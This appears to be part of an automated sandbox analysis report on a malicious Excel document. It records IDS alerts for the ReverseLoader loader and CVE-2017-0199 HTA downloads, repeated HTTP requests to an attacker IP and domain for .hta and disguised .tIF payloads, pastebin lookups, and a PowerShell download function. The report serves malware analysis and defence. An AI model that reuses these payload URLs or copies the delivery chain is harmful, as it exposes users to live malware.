        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 172.245.142.60:80
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.142.60:80 -> 192.168.2.22:49166
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.142.60:80 -> 192.168.2.22:49164
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49174
        Connects to a pastebin service (likely for C&C)
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
        Source: Joe Sandbox ViewIP Address: 54.150.207.131 54.150.207.131
        Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.142.60:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.142.60:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49173 -> 172.245.142.60:80
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.142.60Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.142.60If-Range: "304ff-628d23aa8f80d"
        Source: global trafficHTTP traffic detected: GET /466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.142.60Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 09 Dec 2024 08:34:12 GMTConnection: Keep-AliveHost: 172.245.142.60If-None-Match: "304ff-628d23aa8f80d"
        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A7018 URLDownloadToFileW,7_2_000007FE899A7018
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\290A8C1.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.142.60Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.142.60If-Range: "304ff-628d23aa8f80d"
        Source: global trafficHTTP traffic detected: GET /466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.142.60Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 09 Dec 2024 08:34:12 GMTConnection: Keep-AliveHost: 172.245.142.60If-None-Match: "304ff-628d23aa8f80d"
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: short.ruksk.com
        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: mshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/
        Source: mshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/#v
        Source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/466/kidsni
        Source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.501649818.000000001C170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF
        Source: powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.501649818.000000001C170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFC:
        Source: powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.501255819.000000001AC91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFdll
        Source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFp
        Source: mshta.exe, 00000010.00000002.488933071.00000000003CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: powershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
        Source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
